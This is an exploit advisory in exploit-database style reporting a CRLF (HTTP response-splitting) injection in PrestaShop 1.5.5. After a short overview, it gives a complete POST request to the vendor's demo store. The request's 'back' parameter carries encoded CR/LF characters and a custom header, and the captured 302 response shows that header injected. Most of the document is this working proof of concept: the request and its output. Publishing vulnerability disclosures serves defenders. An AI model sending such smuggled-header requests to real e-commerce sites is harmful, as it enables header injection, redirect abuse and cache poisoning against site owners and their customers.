##############################################################
#Exploit Title: Prestashop v1.5.5 - CRLF Injection Vulnerability 
#Official site: https://www.prestashop.com
#Official Demo : https://demo-store.prestashop.com/
#Risk Level: Medium
#Exploit Author: Esac
#Homepage author : www.iss4m.ma
#Email author : s3cpr0@hotmail.fr
#Last Checked: 06/09/2013
#############################################################
 
 
+----------+
| OVERVIEW |
+----------+
 
PrestaShop is the most reliable and flexible Open-source e-commerce software. Since 2007,PrestaShop has revolutionized the industry by providing features that
engage shoppers and increase online sales. The Prestateam consists of over 100 passionate individuals and more than 350,000 community members dedicated to innovated technology.
It has more than 2.000.000 downloads and won the best open-source e-commerce software in the last few years.

When installing and analyzing PrestaShop on a secure environment I discovered that it's vulnerable for CRLF injection vulnerability that may allow an attacker to include extra HTTP headers when viewing web pages. If Prestashop is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.
 
Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.
 
This vulnerability has been reported for Prestashop v1.5.5 and may be other versions are affected.


+---------------------------------------------------------------------------------------+


HTTP Headers Request  :


POST /fr/adresse HTTP/1.1
Content-Length: 389
Content-Type: application/x-www-form-urlencoded
Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZGtZ3A7mQpE2jo2VD0mzY3wtqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgGGr4hYKm51D3wGkqO0lLNZowKzQVgJqWqSLngur8z4I%3D000404
Host: demo-store.prestashop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&alias=1&back=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&city=San%20Francisco&company=Acunetix&dni=1&firstname=tdupumgx&id_country=231&id_state=&lastname=carbrbbm&other=1&phone=555-666-0606&phone_mobile=555-666-0606&postcode=94102&select_address=1&submitAddress=Valider&token=fa85a76b06b6cd05245288ea8006175a&vat_number=1


HTTP Headers Response :

HTTP/1.1 302 Found
Date: Wed, 28 Aug 2013 10:28:39 GMT
Server: Apache
Set-Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZG1%2BptPMOxtxYYBfzPV0v8ktqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgq4zKl3PuSt10RxAAYjxEcdQEEu5W1AjY6PXJwUz1e34%3D000404; expires=Tue, 17-Sep-2013 10:28:39 GMT; path=/; domain=demo-store.prestashop.com; httponly
Location: https://demo-store.prestashop.com/fr/
 ZSL-Custom-Header:love_injection
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


 
+----------------------------------------------------------------------------------------+
 
Knowledge is not an Object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra 
WwW.Iss4m.Ma
./Issam IEBOUBEN Aka Esac